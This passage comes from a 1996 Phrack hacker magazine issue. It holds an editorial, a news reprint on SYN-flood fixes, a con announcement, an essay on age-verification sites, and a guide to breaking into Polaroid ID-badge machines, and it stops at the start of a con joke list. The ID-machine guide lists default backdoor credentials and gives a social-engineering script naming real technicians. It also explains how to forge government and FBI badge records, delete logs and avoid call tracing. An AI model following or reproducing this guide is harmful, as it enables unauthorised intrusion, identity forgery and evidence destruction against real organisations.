.oO Phrack 49 Oo.
Volume Seven, Issue Forty-Nine
1 of 16
Issue 49 Index
____________________
P H R A C K 4 9
November 08, 1996
____________________
Welcome to the next generation of Phrack magazine. A kinder, gentler, Phrack.
A seasoned, experienced Phrack. A tawdry, naughty Phrack. A corpulent,
well-fed Phrack. Phrack for the whole family. Phrack for the kids, Phrack
for the adults. Even Phrack for the those enjoying their golden years.
If you thought 48 was a fluke, here is 49, RIGHT ON SCHEDULE. Full speed
ahead, baby. We promised timely Phrack. We promised quality Phrack. Here
are both in ONE CONVENIENT PACKAGE! We trimmed the fat to bring you the lean
Phrack. Chock full of the healthy information you need in your diet. All
natural. No artificial ingredients. No snake oil. No placebo effect.
Phrack is full of everything you want, and nothing you don't.
This issue is the first *official* offering from the new editorial staff. If
you missed them, our prophiles can be found in issue 48. Speaking of 48,
what a tumultuous situation article 13 caused. All that wacking SYN flooding.
Well, it got the job done and my point across. It got vendors and programmers
working to come up with work-around solutions to this age-old problem. Until
recently, SYN-flooding was a skeleton in the closet of security professionals.
It was akin the crazy uncle everyone has, who thinks he is Saint Jerome. We
all knew it was there, but we ignored it and kinda hoped it would go away...
Anyway, after this issue, I hope it *will* just go away. I have done
interviews for several magazines about the attack and talked until I was blue
in the face to masses of people. I think the word is out, the job is done.
Enough *is* enough. " SYN_flooding=old_hat; ". Onto bigger and better things.
A few more quick points (after all, you want Phrack Warez, not babbling
daemon9). I want to thank the community for supporting me (and co.) thus far.
Countless people have been quite supportive of the Guild, the Infonexus, and
of Phrack. Time and work do permit me to get back to all of you individually,
so just a quick blurb here. Thank you all. I will be using Phrack as a tool
to give back to you, so please mail me (or any of the editors with your
suggestions). This is *your* magazine. I just work here.
Most of all, I am stoked to be here. I am giving this my all. I'm fresh, I'm
ready... I'm hyped + I'm amped (most of my heros don't appear on no stamps..).
Drop us a line on what you think of 49. Comments are encouraged.
Bottom line (and you *can* quote me on this): Phrack is BACK.
- daemon9
[ And remember: r00t may own you, but the Guild loves you ]
[ TNO, on the other hand, doesn't even fucking care you exist ]
---------------------------------------------------------------------------
Enjoy the magazine. It is for and by the hacking community. Period.
Editors : daemon9, Datastream Cowboy, Voyager
Mailboy : Erik Bloodaxe
Elite : Nirva (*trust* me on this one)
Raided : X (investigated, no charges as of yet)
Hair Technique : Mycroft, Aleph1
Tired : TCP SYN flooding
Wired : Not copping silly slogans from played-out, vertigo
inducing magazines.
Pissed off: ludichrist
Pissed on: ip
News : DisordeR
Thanks : Alhambra, Halflife, Snocrash, Mythrandir, Nihil, jenf,
xanax, kamee, t3, sirsyko, mudge.
Shout Outs : Major, Cavalier, Presence, A-Flat, Colonel Mustard,
Bogus Technician, Merc, Invalid, b_, oof, BioHazard,
Grave45, NeTTwerk, Panzer, The Bishop, TeleMonster,
Ph0n-E, loadammo, h0trod.
Phrack Magazine V. 7, #49, November 08, 1996. ISSN 1068-1035
Contents Copyright (c) 1996 Phrack Magazine. All Rights Reserved.
Nothing may be reproduced in whole or in part without written
permission from the editors. Phrack Magazine is made available
quarterly to the amateur computer hobbyist free of charge.
Any corporate, government, legal, or otherwise commercial usage
or possession (electronic or otherwise) is strictly prohibited without
prior registration, and is in violation of applicable US Copyright
laws. To subscribe, send email to phrack@well.com and ask to be
added to the list.
Phrack Magazine
603 W. 13th #1A-278 (Phrack Mailing Address)
Austin, TX 78701
ftp.fc.net (Phrack FTP Site)
/pub/phrack
http://www.fc.net/phrack (Phrack WWW Home Page)
phrack@well.com (Phrack E-mail Address)
or phrackmag on America Online
Submissions to the above email address may be encrypted
with the following key (note this is a NEW key):
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQENAzJuWJgAAAEH/2auap+FzX1AZOsQRPWRrRSOai2ZokfVpWWJI8DRuSpX9l7w
5qWHrZdL/RweA4lgwAmcrAOD6d8+AzZfXEhkKi92G9ZNy2cjsb5g7oamkcPmC03h
pdhRe5rHXDWUtXDEhHlkV0WvkLXrhFijW2VdJ2UDFyFd8q0nBSIz+JTGneNO0w4q
aowCx3gZpEb4hkEU1LFoJXywZhnBg06jSxD9exbBF2WKeealqTlntlcsMmeJ3OdS
9fqnGI19BWirqkIJYtNXdzP4M2usOEvikrdhXwSbCNcDGcY6pyKco2rKbBUj5V2I
8/2L0TSGSaRBZ/YKRplwycldy63UVVTLMNGQCCUABRG0KlBocmFjayBNYWdhemlu
ZSA8cGhyYWNrZWRpdEBpbmZvbmV4dXMuY29tPg==
=eHJS
-----END PGP PUBLIC KEY BLOCK-----
ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED
Phrack goes out plaintext... You certainly can subscribe in plaintext
.oO Phrack 49 Oo.
-------------------------------------
Table Of Contents
1. Introduction 7 K
2. Phrack loopback 6 K
3. Line Noise 65 K
4. Phrack Prophile on Mudge by Phrack Staff 8 K
5. Introduction to Telephony and PBX systems by Cavalier 100K
6. Project Loki: ICMP Tunneling by daemon9/alhambra 10 K
7. Project Hades: TCP weaknesses by daemon9 38 K
8. Introduction to CGI and CGI vulnerabilities by G. Gilliss 12 K
9. Content-Blind Cancelbot by Dr. Dimitri Vulis 40 K
10. A Steganography Improvement Proposal by cjm1 6 K
11. South Western Bell Lineman Work Codes by Icon 18 K
12. Introduction to the FedLine software system by Parmaster 19 K
13. Telephone Company Customer Applications by Voyager 38 K
14. Smashing The Stack For Fun And Profit by Aleph1 66 K
15. TCP port Stealth Scanning by Uriel 32 K
16. Phrack World News by Disorder 109K
575k
-------------------------------------
"...There's MORE than maybes..."
- Tom Regean (Gabriel Bryne) "Miller's Crossing"
[ Obviously referring to the blatent truism that Phrack IS back ]
"...Fuckin' Cops..."
- Verbal Kint/Keyser Soze (Kevin Spacey) "The Usual Suspects"
[ Not sure what was meant by that.. ]
"Got more funky styles than my Laserjet got fonts"
- 311/Grassroots "Omaha Stylee"
[ That would be referring to us, of course ]
EOF
.oO Phrack Magazine Oo.
Volume Seven, Issue Forty-Nine
File 2 of 16
Phrack Loopback
-----------------------------------------------------------------------------
[The Netly News]
September 30, 1996
Today, Berkeley Software Design, Inc. is expected to publicly release
a near-perfect solution to the "Denial of Service," or SYN flooding attacks,
that have been plaguing the Net for the past three weeks. The fix, dubbed
the SYN cache, does not replace the need for router filtering, but it is
an easy-to-implement prophylaxis for most attacks.
"It may even be overkill," says Alexis Rosen, the owner of Public
Access Networks. The attack on his service two weeks ago first catapulted
the hack into public consciousness.
The SYN attack, originally published by Daemon9 in Phrack, has
affected at least three service providers since it was published last month.
The attack floods an ISP's server with bogus, randomly generated connection
requests. Unable to bear the pressure, servers grind to a halt.
The new code, which should take just 30 minutes for a service provider
to install, would keep the bogus addresses out of the main queue by saving two
key pieces of information in a separate area of the machine, implementing
communication only when the connection has been verified. Rosen, a master of
techno metaphor, compares it to a customs check. When you seek entrance to a
server, you are asked for two small pieces of identification. The server then
sends a communique back to your machine and establishes that you are a real
person. Once your identity is established, the server grabs the two missing
pieces of identification and puts you into the queue for a connection. If
valid identification is not established, you never reach the queue and the
two small pieces of identification are flushed from the system.
The entire process takes microseconds to complete and uses just a few
bytes of memory. "Right now one of these guys could be on the end of a 300-baud
modem and shut you down," says Doug Urner, a spokesman for BSDI. "With these
fixes, they just won't matter." still, Urner stresses that the solution does
not reduce the need for service providers to filter IP addresses at the router.
Indeed, if an attacker were using a T1 to send thousands of requests per
second, even the BSDI solution would be taxed. For that reason, the developers
put in an added layer of protection to their code that would randomly drop
connections during an overload. That way at least some valid users would
be able to get through, albeit slowly.
There have been a number of proposed solutions based on the random-drop
theory. Even Daemon9 came up with a solution that looks for any common
characteristics in the attack and learns to drop that set of addresses. For
example, most SYN attacks have a tempo -- packets are often sent in
five-millisecond intervals -- When a server senses flooding it looks for these
common characteristics and decides to drop that set of requests. Some valid
users would be dropped in the process, but the server would have effectively
saved itself from a total lockup.
Phrack editor Daemon9 defends his act of publishing the code for the
attack as a necessary evil. "If I just put out a white paper, no one is
going to look at this, no one is going to fix this hole," he told The
Netly News. "You have to break some eggs, I guess.
To his credit, Daemon9 actually included measures in his code that made
it difficult for any anklebiting hacker to run. Essential bits of information
required to enable the SYN attack code could be learned only from reading
the entire whitepaper he wrote describing the attack. Also, anyone wanting to
run the hack would have to set up a server in order to generate the IP
addresses. "My line of thinking is that if you know how to set a Linux up
and you're enough in computers, you'll have enough respect not to do this,"
Daemon9 says. He adds, "I did not foresee such a large response to this."
Daemon9 also warns that there are other, similar protocols that can be
abused and that until there is a new generation of TCP/IP the Net will be open
to abuse. He explained a devastating attack similar to SYN called ICMP Echo
Flood. The attack sends "ping" requests to a remote machine hundreds of times
per second until the machine is flooded.
"Don't get me wrong," says Daemon9. "I love the Net. It's my bread and
butter, my backyard. But now there are too many people on it with no concern
for security. The CIA and DOJ attacks were waiting to happen. These holes were
pathetically well-known."
--By Noah Robischon
[ Hmm. I thought quotation marks were indicative of verbatim quotes. Not
in this case... It's funny. You talk to these guys for hours, you *think*
you've pounded the subject matter into their brains well enough for them to
*at least* quote you properly... -d9 ]
[ Ok. Loopback was weak this time. We had no mail. We need mail. Send us
mail! ]
----<>----
.oO Phrack Magazine Oo.
Volume Seven, Issue Forty-Nine
File 3 of 16
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
------------------------------------------------------------------------------
CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96
Tengo que hable con mi abogado.
----------------------------------------------------------------
What : A computer/telephony/security conference. (show this part to your
boss.)
Where: Fort Brown Hotel, Brownsville Texas.
When : 28 & 29 December, 1996
Who : The usual gang of cretins.
Why : It's winter, and it is 12 degrees outside. The dumpsters are frozen
shut, and there are icicles on the payphones. Brownsville is at the
Southern-most tip of Texas, right up against...Mexico. Yes, Mexico,
land of cheap cerveza, four-dollar strippers, and liberal drinking
laws. Mexico, where you too can own your very own Federal law
enforcement official for a fistful of pesos.
----------------------------------------------------------------
Speakers
Anybody wishing to speak at CuervoCon should send
e-mail to the address at the bottom of this announcement.
Currently the list includes:
u4ea (by teleconfrence)
Major
ReDragon
Caffiend (about her Breasts)
daemon9 (about his Breasts)
----------------------------------------------------------------
Events
"How Much Can You Drink?"
"Fool The Lamer"
"Hack The Stripper"
"Hack The Web Server"
"sk00l"
"Ouija Board Hacking"
...as well as a variety of Technical Presentations.
----------------------------------------------------------------
General Information
The Fort Brown Hotel will have available to us, 125 rooms at the holiday in @
$55 a room, and $75 rooms at the ramada @ $45 each. The Fort Brown was
previously an actual fort when it was closed down by Uncle Sam. It became one
large hotel until it was recently purchased and split into the Holiday Inn and
the Ramada. The Fort Brown was chosen because it is across the street from
the bridge to Mexico. You can call the Fort Brown Ramada at:
210-541-2921
You can call the Fort Brown Holiday Inn at:
210-546-2201
Call for reservations, make sure to tell them your with CuervoCon.
Friday and Saturday the con will be in the 'Calvary' room. While Sunday we
have the 'Fortress Room' where all the big speakers will be. Friday and
Saturday we will have a few speakers and activities. Friday Night mainly,
so we can have people arrive on time. We hope to have the con room open 24
hours a day.
Brownsville is right on the Mexican border, adjacent to the Mexican town
Matamoris. The Gulf of Mexico is 25 miles away. Brownsville has a population
just over 100,000. The police force includes 175 officers, and a wide variety
of federal law enforcement agencies have a strong presence there as well.
The climate is semi-tropical, and the RBOC is SouthWestern Bell.
Matamoris is the other half of brownsville. Home of over 1/2 a million
people, it is known since the early 1900's as a pit of sin. The federale's
are not to be fucked with and it is serviced by TelMex. It is known for its
bars, strip clubs and mexican food. Matamoros also has an airport incase
you live in Mexico and care to go, via aeromexico.
Directions:
In Texas Driving - Go anyway you can to get to US 77 South. Take 77 South
till it ends in Brownsville. From there you will turn right on International.
Proceed all the way down international, right before the bridge, turn left.
The Fort Brown will be on the left.
For those flying in - We are going to try to have a shuttle going. Also just
tell the cab driver, Fort Brown.
The Con Registration Fee, aka the pay it when you walk in our we will beat you
up, is only 10$ and an additional 5$ for the 'I paid for eliteness sticker'
which will let you into the special events, such as hack the stripper.
----------------------------------------------------------------
Celebrity Endorsements
Here's what last years participants had to say about CuervoCon:
"I attended the CuervoCon 95. I found many people there who, fearing a
sunburn, wanted to buy my t-shirts!" -ErikB
"I tried to attend, but was thwarted by "No Admittance to The Public"
sign. I feel as though I missed the event of the year." - The Public
"mmmm...look at all the little Mexican boys..." -Netta Gilboa
"Wow! CuervoCon 95 was more fun that spilling my guts to the feds!" -
Panther Modern
"CuervoCon is our favorite annual event. We know we can give
security a day of rest, because you people are all too drunk to
give us any trouble..." - AT&T
"No moleste, por favor." - TeleMex
Don't miss it!
----------------------------------------------------------------
Have you ever hacked a machine in your hometown from a foreign
country?
Have you ever had to convert dollars into pesos to get your bribe right?
Have you ever spent time in a foreign prison, where your "rights as an
American" just don't apply?
Have you ever been taken down for soemthing that wasn't even illegal
half an hour ago?
YOU WILL! And the con that will bring it to you?
CUERVOCON 96
----------------------------------------------------------------
CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96 CUERVOCON 96
brought to you by
- S.o.B. - TNo - PLA - Phrack - The Guild - F.U.C.K. - SotMESC -
Contact Information
info@cuervocon.org
www.cuervocon.org - Look here for updates.
Voice mail system coming up soon.
----------------------------------------------------------------
----<>----
*** The truth behind the Adult Verification Services
('porno' will set you free)
*** By your passively skeptical author, t3.
*** 10.30.96
Let's speak for a minute about 'porno'. 'Porno' has saturated the
Net to a level in which it's difficult *not* to see it, regardless if
you're looking for it. It can be found on the largest web site and the
smallest ftp site. It can be found on Usenet, it can be found with any
one of numerous search engines. Let's not delude ourselves, porno is
*everywhere* and anyone with the motor skills to click a mouse can have access
to it.
About a year ago a concept came along called 'Adult Verification'. This first
started out by people writing crude cgi scripts that would query every person
as to their age. 'Are you 18' it would say, and even a sexually aware 9-year
old would know to say 'yay' to this.
Soon thereafter, someone topped this 4-line piece of code by writing a login
interface, most likely it was incorporated into Netscape or some other, less
worthy browser. This program made use of the actual browser to authenticate
users. Of course one needed a login and password, of which had to be manually
added after ample proof of age was received. If one merely wanted to
cover one's ass, this would not be a logical solution.
This all occurred during which the CDA (Communications Decency Act) had
actually existed. On June 7, 1995, the CDA was passed through the Senate
to the President, signed, and made a law:
(1) in the heading by striking `Broadcasting obscene
language' and inserting `Utterance of indecent or profane
language by radio communication; transmission to minor of
indecent material from remote computer facility, electronic
communications service, or electronic bulletin board service';
et al...Now it was illegal to transmit 'indecent material' on the
Internet. If this were to actually be adhered to, the Net would shrink
so drastically that the current topology would last ten years before
needing an upgrade.
Is was soon apparent that this act was not going to fly. Groups like the
EFF and the ACLU suddenly became extremely busy. Companies such as Apple
and Microsoft challenged the constitutionality of such a law and took
this directly to court. It was also apparent that the transmission of
'indecent material' would not disappear, but merely go further underground.
Indeed, this is exactly what happened. Soon thereafter Adult Verification
services began popping up. AVS (Adult Verification Services), Adultcheck,
Adultpass, and a slew of others came up with an idea.
The idea was to verify a person's adult status by acquiring one's credit
card number. This would, ahem, without a doubt, prove that the individual
was 18. Why? Because you had to be 18 to have a credit card of course!
Someone obviously didn't take into consideration the five or so million
pre-adults that would make it their goal to surpass such shotty
authentication.
It began by the government stating that a credit card is a legal means of
verifying one's age, this allowing those distributing 'porno'graphic
materials to continue distributing to those 18 and over. The initial
means that the 'providers of porn' used to do this was to basically
verify the format of the card and not actually run a check on it. As
most of us all know, there have been plenty of "Credit Card Generators"
produced in the last five years, quite capable of fooling these shotty
authentication systems.
As this authentication was obviously lacking in the "authentication"
part, the next step was to actually validate the cards. This began and
ended nearly as quickly, for finding a credit card (for example, in
mommy's purse), junior could peruse porn until his dick grew red and chafed.
On June 12, 1996 it was was determined that the CDA indeed violated one's
constitutional rights and was striken down as a law. More on this at
.
But it didn't seem to phase the Authentication services.
The Authentication Services currently verify age by obtaining a credit
card, verifying it, and actually charging a fee for the service. About
$9.95 for two years which entitles you to an abundance of graphic, ad,
and airbrush-laden web pages and images. This most likely sufficiently
scared off the less determined of minors because now they'd be engaging in
credit card fraud.
It's truly odd that after it has been deemed legal to distribute said
porn, that all of these services still insist that it's illegal to do
so. Let us realize that Usenet barely flinched when the CDA was in
effect, and still offered gigs upon (glorious) gigs of nude bodies to
oggle at.
After taking a good look at this whole bizarre operation, I have made a
few conclusions of my own.
Charging $9.95 for two years of access to 'porno'graphy seems a little too
good to be true. One must realize that there is a charge to the billing
company for each credit card transaction made. I'd be surprised if it
wasn't half of this ten bucks. These authentication companies also pay
"handsomely" the purveyors of porn. In order for such a service to
function, obviously there needs to be an agreement with the distributor and the
authenticator.
Now, one that distributes 'porno'graphy on the Net will certainly not feel
the need to do these Verification Services any favors. The majority of
people that do run these explicit sites are certainly not interested in
supporting censorship of their material (probably 90% money-making). The
AVS's knew this and offered a stipend to those using their services.
The AVS's currently work by paying the site that contains 'indecent
material' a certain amount each time that site gets another person to
sign up with their service. This works by the AVS sending html that is
put on a verification page. If one finds this page important enough,
they may be convinced to sign up with the service that allows you to
access it.
The stipend is generally around $4.00, and as high as $7.50. There are
many AVS's, and the majority of the said 'sites' use more than one,
sometimes all of them for verification. If a particular site uses one
AVS exclusively, the AVS will pay on the highest end of their scale for new
recruits.
If we get into some simple math, we may find some contradictions
regarding this. The initial fee to those interested in accessing porn is
$9.95. Out of these we can safely say that more than $3.00 goes to
simply checking the validity of the card and billing it. This leaves the
AVS with $6.95.
Now, on the receiving end we have a very minimum of $4.00 going towards
each new person that signs up. It's probably safe to say that over 90%
of new customers to these AVS's sign-up through 'porno'graphic pages and
not directly from the site itself.
So $9.95 ends up being $6.95 after expenses, and then the service sends
another $4.00 to the person that gave them the account. This leaves the
AVS with a maximum of $2.95 total.
The costs running an AVS are surely not exorbant, but are certainly not
cheap. I have yet to find an AVS running off of anything less than at T1
(1.544mbit) speeds. This translates to an extreme minimum of 1k/month.
If you include employees, office space, and incidentals, running any such
service couldn't cost less than 5k a month at the very least. This would
mean to break even one would have to bring in:
5000/2.95
1694 new customers a month, simply to break even! That's a lot
considering the membership lasts for two years. And this is in the
*best-case* scenario. I would be hard-pressed to believe that one such
service could steadily rely on such a base of new clients every month
indefinitely!
I have theorized that these services are in fact not self-run moneymaking
ventures, but are actually being funded by a higher authority. It's
quite feasible to believe that the government, having been challenged and
beat, have actually allocated funds to protecting the minors of the Net
from obscenity. It's *certainly* not far-fetched, especially with Al
Gore (think, Tipper) in an improperly high position.
The government could allocate a comparitively paltry sum of one million a
year towards funding (even creating) companies that act merely to pay
people to be complacent. What if the government merely let relatively
computer proficient professionals bid on forming these AVS's? What if?
Well, unless i'm overlooking something, I can't see too much illogic to
my theory.
Another consideration of these services is that even at their current
state, they are extremely easy to overcome. So easy, in fact, that their
existence will hardly offer much resistance to a horny teenager. Remember,
people will do anything to get 'porno'graphy.
Such holes in these systems are that the verified member of such an AVS
connects to a sexually explicit site, is bounced backed to the AVS for
authentication, and is then bounced back again to the page (url) that
contains the "naughty stuff". This page can be simply bookmarked and
distributed to anyone and their Mom.
Why? All the services I've come across (the largest ones) do not
authenticate the target url, they target the initial "warning" page and
contain information to pass the user on to the naughty stuff. Thus if
one single person can obtain the target url, he can bypass all future
authentication and can as well pass the url on through various channels,
quite easily ending up in the hands of a minor.
As well, if stupidity was a metaphor for AVS's, most of the target url's
have filenames such as "warning.html" or "granted.html". Any
half-respectable search engine (such as AltaVista) is capable of snarfing
out such information. Doubly-so because these services will obviously
want to advertise their existence.
The only method that seems to partially protect minors from 'porno'graphy
is the method of installing client-based software such as SurfWatch that
try to censor 'porno'graphy. This, as well, relies on a willing company or
individual to operate. This works quite archaically by imbedding META
tags in html source. For example:
This particular tag would be placed in the receiving html of a
co-operative service or individual. The client-based software would
search for such tags and censor the content accordingly. From my
understanding, those using AVS's are not required to embed these tags in
their "warning" page html. If they do not, which I would imagine many
probably wouldn't, then suddenly these client-based censorship tools are
rendered useless.
So in conclusion, I would give a big thumbs-down for this whole pathetic
means of controlling freedom. The Internet was meant to be a place to
free exchange of information. Today a minor is just as able to find
explicit material on the Net as he/she is able to dig through Mom and
Dad's dresser for copies of Hustler. A minor is just as capable of
watching R or X-rated movies, stealing a magazine from a store, or even
buying one.
It's time to stop using half-assed and crippled ways of protecting kids
from obscenity on the Net. If you're a parent and you don't want your
child to view such 'porno'graphy, then why not do what you're supposed to
do and discipline the kid.
Lazy fuckers.
t3
.end
----<>----
T.A.C.D Presents...
Hacking ID Machines
By PiLL
Table Of Contents
I. What is an ID Machine & who uses them?
II. Hardware and software of the ID machines
III. Common security of ID Machines
IV. What to do once you get in
V. Closing
VI. Greets
Part One: What is an ID machine and who uses them?
First we will start with the basics. An IDM or ID Machine is exactly
what the name entails. It is a computer that government and large
companies use to make security badges and ID cards for employees and
visitors. All of the IDM's are DOS based so security, to say the least,
sucks. There are four models of IDM's. The one we will be covering the
most is the latest and greatest: the ID 4000. Also in the family of
IDM's are the 3000, 2000+, and 2000. I have heard of an ID 1000 but I
have yet to see or play with one, so if you find one, tell me. The 2000
is DOS 3.3 so I can imagine that an ID 1000 is even a bigger waste of
time. IDM's are manufactured by a branch of Polaroid entitled Polaroid
Electronic Imaging. If you want more information on IDM's call (800)343-5000
and they will send you some general specs. I will let you know right
off the start that these machines sell for as much as $75,000.00 but the
average price is around $40,000.00. So getting caught crashing one is
NOT a good idea.
You are probably wondering what companies use ID machines. Here is a
brief list. All of the Colorado and Alaska DMV's, The IRS, The FBI, The
U.S. Mint, The Federal Reserve, almost any military branch, Hewlett
Packard, Polaroid, Westinghouse (I wouldn't recommend fucking with them:
for more information on Westinghouse check out the movie Unauthorized Access
available from CDC's home page), and all of the major prisons in the
United States. By now you should be getting ideas of the potential fun
you can have. Not that I would ever use what I know for anything illegal
;)
Part Two: Hardware and Software
I will cover each machine in order but you will probably notice that the
ID4000 will get by far more attention then any other.
Hardware and Software for the 2000+ and 2000 is kind of like teaching
someone about the Apple ][ and how to use Logo so I will try not to bore
you to much with them. The 2000 series are unique to the others because
they are one full unit. The hardware is basically a really cheesy
oversized case with a 9 monochrome monitor, a 3 monitor for viewing the
victim of the hideous picture it takes, a 286 Wyse computer with 1meg of
RAM (really hauls ass), a data compression board, image processing board
(*Paris* Board), a signature scanner, a color film recorder or CFR, a
WORM Drive, a modem, and most of the time a network card so the data can
be stored on a mainframe. The Software of the 2000 series is a really
neat database program running under DOS 3.3. If you have never heard of
or used EDLIN, I would not recommend playing with a 2000. The only major
differences between an ID2000 and an ID2000+ is that the computer on the
2000+ is a HP Vectra 386 with 4megs and a SCSI Interface. That's all you
really need to know you probably won't ever encounter one unless you go
trashing a lot.
The ID3000 is also an HP 386/20 but uses DOS 5.0 and a Matrox Digital
Processing board instead of the old Paris board of the 2000 series.
This came about when your state ID actually started to remotely resemble
you in 1992. Also in the 3000 years their were more peripherals
available such as the latest CFR at the time (I think it was the 5000),
PVC printers, and bar code label printers. The software is basically
DOS 5.0 but this time they use a database shell much like DOSSHELL as
the interface with the machine. The 3000 uses SYTOS for data storage and
transfer and it is best to dial in using a program called Carbon Copy.
The 4000 is the best even though it's not that great. It was is the
first IDM in the Polaroid line that let the customer customize the
machine to their needs. This is the machine that you see when you go to
the DMV, at least in Denver. It consists of a JVC camera, a Matrox
processing board, a data compression board, an Adaptec 1505 SCSI card, a
14.4 modem, a network card, and can have any of the following added to
it: a PVC printer (in case you didn't know that's what they use on
credit cards), a magnetic stripe encoder, a bar code printer, a thermal
printer, a CFR (usually the HR6000 like at the DMV), a Ci500 scanner,
and signature pad, a finger print pad (interesting note if you have a
black light and one of the new Colorado Driver licenses hold it under a
black light and look what appears under your picture, you should see
your finger print), and a laminator. Now some of you are thinking what
about the holograms? Those are actually in the lamination, not on the
badge itself. To obtain lamination walk into the DMV and look to the
right or left of the machine if you see a little brown box that's what
you need, but please remember to leave some for the rest of us that
might be next in line. Or you can go to Eagle hardware and buy a bolt
cutter for the dumpster but that's a different text file.
The 4000 runs DOS 6.0 and Windows 3.1. The actual software for the 4000
is a terrible Visual Basic shell that reminds me of the first time I ran
that program AoHell. The only difference is that AoHell did what it was
suppose to, the 4000 software is a headache of GPF's , Environment
Errors, and Vbrun errors. A nice feature that the 4000 has that the
other IDM's don't, is the ability to create and design your own badge.
You can even do it remotely ! ! =) . Unfortunately the program Polaroid
developed for this makes paintbrush look good. But on a bright note you
can import Images.
Briefly here is a run down of what exactly happens when you get your
picture taken on an ID4000 at the DMV. At the first desk or table the
narrow eyed, overpaid, government employee will ask you for some general
information like a birth certificate, picture ID, name, address, SSN#, what
party you prefer to vote for, and whether or not you want to donate your
organs in the event of your untimely demise. You reply by handing her
your fake birth certificate and ID that you had printed no more then an
hour ago, hoping the ink is dry. "My name is Lee Taxor I reside at
38.250.25.1 Root Ave in the Beautiful Port apartments #23 located in
Telnet, Colorado, I prefer to vote for Mickey Mouse of the Disney party,
and can't donate my organs because Satan already owns them." The
disgruntled employee then enters all your information in the correct fields
while never taking an eye off you in fear that you know more about the
machine he or she is using then they do (perhaps you shouldn't of worn
your Coed Naked Hacking T-shirt that you bought at DefCon 4). As soon as
the bureaucrat hits all of the information is sent to a database
located in the directory named after the computer (i.e.
c:\ID4000\ColoDMV\96DMV.MDB). Then you are directed to the blue screen
where you stare at the JVC monitor trying to look cool even though the
camera always seems to catch you when you have to blink or yawn or even
sneeze. *SNAP* the picture is taken and displayed on the monitor where
the employee can laugh at your dumb expression before printing it. If
the employee decides to print the picture it is saved as a 9 digit
number associated with your database record. The 4000 then compresses
the picture and saves it. So the next time you go in and the pull up
your record it will automatically find the associated picture and
display it on the screen. But in the mean time you grab your fake ID the
DMV just made for you and leave happy.
In a nut shell that's all there is to these machines.
Part Three: Security
I think a better topic is lack of security. I have yet to see any of
these machines that are remotely secure. Before we go any further the
4000 is best accessed using CloseUp the others using Carbon Copy, But
any mainstream communications program will more then likely work. You
Dial and it asks you right away for a username and password. whoa, stop,
road block right their. Unless of course you know the backdoor that
Polaroid put in their machines so they can service them. =)
ID4000
Login: CSD (case Sensitive)
Password: POLAROID (who would of guessed?)
ID3000
Login: CPS
Password: POLAROID (god these guys are so efficient)
ID2000+ And ID2000
Login: POLAROID (ahh the good old days)
Password: POLAROID
Now if these do not work because they have been edited out, there are
still a few VERY simple ways of getting in to your victims system. The
first is to go with every hackers default method of social engineering.
The best way to do this is to call them up and say "Hi this is (insert
tech name here) with Polaroid Electronic Imaging! How is it going down
there at (name of company)." The say "pretty good!" in a funny voice
thinking what great customer support. You say "How is the weather been
in (location of company)" they reply with the current weather status
feeling that they can trust you cause you are so friendly. You say "well
(name of person), we were going through our contacts one by one doing
routine upgrades and system cleaning to ensure that your database is not
going to get corrupted anytime soon and that everything is doing what it
is supposed too, if you know what I mean (name of person)." Now they
reply "oh yeah" and laugh with you not having a clue of what you are
talking about. And they then say "well everything seems to be in order."
You say "great sounds good but old *Bob* would have my head if I didn't
check that out for myself." Then you ask if the modem is plugged in and
wait for the reply. The either say yes or no then you ask them go plug
it & give you the number or just give you the number. Then they comply
cause they are just sheep in your plan. You say "Hey thanks (name) one
more thing would happen to know if user CSD:Polaroid exists or did you
guys delete it." If they deleted it ask them to put it back in, giving
you administrative access. They probably know how to and will comply. If
they need help have them do the following: Click on the combination lock
icon at the top of the screen. This will bring them to the
administrative screen and they will have the choices of Purge, Reports,
and Passwords. Have them click on passwords. Then have them enter you as
a new user with CSD as your Name and Polaroid as your Password. After
they have done that make sure they give you all the Keys. The keys are
basically access levels like on a BBS. Lets some users do certain things
while others can not. The only key you need is administrative but have
them give you the rest as well. The other keys are Management and Luser
I think. The keys are located to the left of the user information that they
just entered. Then have them click OK and close the call politely. Ta
da!! Here is a list of Polaroid phone techs but I would not advise using
Bob or Aryia cause their big wigs and nobody ever talks to them.
Senior Techs of Polaroid
Regular Techs
Bob Pentze (manager)
Don Bacher
Aryia Bagapour (assistant)
Richard
Felix Sue
Rick Ward
Jordan Freeman
Dave Webster
Call 1-800-343-5000 for more Names =)
Part Four: What to Do once you get in
Now that your in you have access to all of their database records and
photos. Upload your own and have fun with it! Everything you do is
logged so here's what you'll want to do when you're done making yourself
an official FBI agent or an employee of the federal reserve. Go to all
of the available drives which could be a lot since they are on a network
and do a search from root for all of the LOG files i.e. C:\DIR /S *.LOG
Then delete the fuckers!!!! You can also do this by FDISK or formatting.
Just kidding! But if you want to do it the right way then go to the
admin screen and purge the error and system logs.
Basically if you want the form for government badges or the FBI agents
database this is the safest way to go. These computer do not have the
ability to trace but it does not mean the phone company doesn't! ANI
sucks a fat dick so remember to divert if you decide to do this. If you
don't know how to divert I recommend you read CoTNo or Phrack and learn
a little bit about phone systems and how they work.
Moving around in the software once your past the security is very simple
so I'm not going to get into it. If you can get around a BBS then you
don't need any further help. Just remember to delete or purge the logs.
Part Five: Closing
If your looking for some mild fun like uploading the DMV a new license
or revoking your friends this is the way to do it. However if you're
looking to make fake ID's I recommend you download the badge format and
purchase or obtain a copy of IDWare by Polaroid. IDware is a lot like
the 4000 software except you only need a scanner not the whole system.
As a warning to some of the kids I know of one guy who bought a
$50,000.00 ID4000 and paid it off in a year by selling fake ID's. When
Polaroid busted him they prosecuted to the fullest and now the guy is
rotting in a cell for 25 to 50 years. Just a thought to ponder.
Peace
PiLL
Greetz
Shouts go out to the following groups and individuals: TACD, TNO, MOD,
L0pht, CDC, UPS, Shadow, Wraith, KaoTik, Wednesday, Zydirion, Voyager,
Jazmine, swolf, Mustard, Terminal, Major, Legion, Disorder, Genesis,
Paradox, Jesta, anybody else in 303, STAR, BoxingNuN, MrHades, OuTHouse,
Romen, Tewph, Bravo, Kingpin, and everyone I forgot cause I'm sure there
are a bunch of you, sorry =P.
----<>----
The Top Ten things overheard at PumpCon '96
10. "You gotta problem? Ya'll gotta rowl!"
- Keith the security guard
